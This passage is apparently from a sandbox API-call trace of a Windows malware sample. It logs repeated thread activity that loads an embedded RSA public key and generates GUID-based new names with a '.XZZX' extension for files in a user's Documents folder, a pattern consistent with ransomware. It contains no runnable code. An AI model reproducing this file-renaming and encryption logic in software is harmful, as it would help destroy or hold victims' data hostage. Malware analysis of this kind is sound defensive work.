LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.947] lstrcpyW (in: lpString1=0x29af460, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0173.947] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.947] SetErrorMode (uMode=0x1) returned 0x1 [0173.947] lstrcpyW (in: lpString1=0x29af860, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0173.947] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x924edc90, Data2=0xcf32, Data3=0x4e3f, Data4=([0]=0x93, [1]=0xe6, [2]=0x65, [3]=0x3b, [4]=0x14, [5]=0x1b, [6]=0x97, [7]=0x13))) returned 0x0 [0173.947] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned 81 [0173.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0173.947] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\57BF84203F54394E924EDC9041EF1D96.XZZX") returned 81 [0173.947] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 606 os_tid = 0x6f8 [0174.102] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.102] lstrcpyW (in: lpString1=0x29af460, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0174.102] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.102] SetErrorMode (uMode=0x1) returned 0x1 [0174.102] lstrcpyW (in: lpString1=0x29af860, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0174.102] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x45a9ae16, Data2=0xb029, Data3=0x41d7, Data4=([0]=0x88, [1]=0xf8, [2]=0xb1, [3]=0x4c, [4]=0xae, [5]=0x1, [6]=0xaa, [7]=0xb))) returned 0x0 [0174.102] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B8F78CE2222013C8FF50021B265CF810.XZZX") returned 81 [0174.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0174.103] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CFDC01862D4E5B6F45A9AE162FE93FB7.XZZX") returned 81 [0174.103] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 607 os_tid = 0x790 [0174.259] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.259] lstrcpyW (in: lpString1=0x29af460, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0174.259] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.259] SetErrorMode (uMode=0x1) returned 0x1 [0174.259] lstrcpyW (in: lpString1=0x29af860, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0174.259] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xa81504a1, Data2=0x333, Data3=0x4082, Data4=([0]=0xb5, [1]=0x11, [2]=0x1b, [3]=0x3, [4]=0x11, [5]=0x71, [6]=0x82, [7]=0xd2))) returned 0x0 [0174.259] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned 81 [0174.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0174.259] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BB3DCF1300CE5FE6A81504A10369442E.XZZX") returned 81 [0174.259] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 608 os_tid = 0x348 [0174.414] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.414] lstrcpyW (in: lpString1=0x29af460, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0174.414] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.415] SetErrorMode (uMode=0x1) returned 0x1 [0174.415] lstrcpyW (in: lpString1=0x29af860, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0174.415] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xba26526e, Data2=0x8dda, Data3=0x43f0, Data4=([0]=0xa6, [1]=0x1d, [2]=0x77, [3]=0x10, [4]=0x9e, [5]=0xe5, [6]=0xf2, [7]=0x39))) returned 0x0 [0174.415] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BE3510781871306D58A0B1081C6A14B5.XZZX") returned 81 [0174.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0174.415] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A008C7AC25A50A60BA26526E283FEEA8.XZZX") returned 81 [0174.415] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 609 os_tid = 0x51c [0174.570] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.570] lstrcpyW (in: lpString1=0x29af460, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0174.570] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.570] SetErrorMode (uMode=0x1) returned 0x1 [0174.570] lstrcpyW (in: lpString1=0x29af860, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0174.570] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xd485c75b, Data2=0xa3bb, Data3=0x4e76, Data4=([0]=0x87, [1]=0x43, [2]=0x3c, [3]=0x93, [4]=0x28, [5]=0x92, [6]=0xcf, [7]=0x32))) returned 0x0 [0174.570] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4132CC416066089C413F0DC1A1E44D1.XZZX") returned 81 [0174.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0174.571] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6BA79079322E7232D485C75B34C9567A.XZZX") returned 81 [0174.571] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 610 os_tid = 0x36c [0174.728] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.728] lstrcpyW (in: lpString1=0x29af460, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0174.728] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.728] SetErrorMode (uMode=0x1) returned 0x1 [0174.728] lstrcpyW (in: lpString1=0x29af860, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0174.728] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x1a6b8226, Data2=0xf3eb, Data3=0x4e4a, Data4=([0]=0xb9, [1]=0x55, [2]=0x3f, [3]=0x95, [4]=0xfa, [5]=0x64, [6]=0xc9, [7]=0x71))) returned 0x0 [0174.728] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned 81 [0174.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0174.728] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4D3A8AE24A981BEE1A6B82264D330036.XZZX") returned 81 [0174.728] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 611 os_tid = 0x2b4 [0174.883] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.883] lstrcpyW (in: lpString1=0x29af460, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0174.883] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.883] SetErrorMode (uMode=0x1) returned 0x1 [0174.883] lstrcpyW (in: lpString1=0x29af860, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0174.883] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x33ea5f33, Data2=0x63ec, Data3=0x4530, Data4=([0]=0xaf, [1]=0x99, [2]=0xf5, [3]=0x45, [4]=0x9d, [5]=0x53, [6]=0x25, [7]=0xa5))) returned 0x0 [0174.883] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D8B4FBC032E124E029E6603236DA0928.XZZX") returned 81 [0174.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0174.883] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7EE07C041B01584033EA5F331D9C3C88.XZZX") returned 81 [0174.883] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 612 os_tid = 0x57c [0175.038] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.038] lstrcpyW (in: lpString1=0x29af460, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0175.038] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0175.038] SetErrorMode (uMode=0x1) returned 0x1 [0175.038] lstrcpyW (in: lpString1=0x29af860, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0175.038] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xd8a44b0a, Data2=0xc2c9, Data3=0x40ae, Data4=([0]=0xbb, [1]=0x45, [2]=0xca, [3]=0x78, [4]=0x6b, [5]=0x5c, [6]=0xd8, [7]=0xfb))) returned 0x0 [0175.039] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E1CB2DE23002B20E4903A282342F9656.XZZX") returned 81 [0175.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0175.039] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\99DC7EDA3136A49ED8A44B0A33D188E6.XZZX") returned 81 [0175.039] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 613 os_tid = 0x6a0 [0175.197] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.197] lstrcpyW (in: lpString1=0x29af460, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0175.197] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: 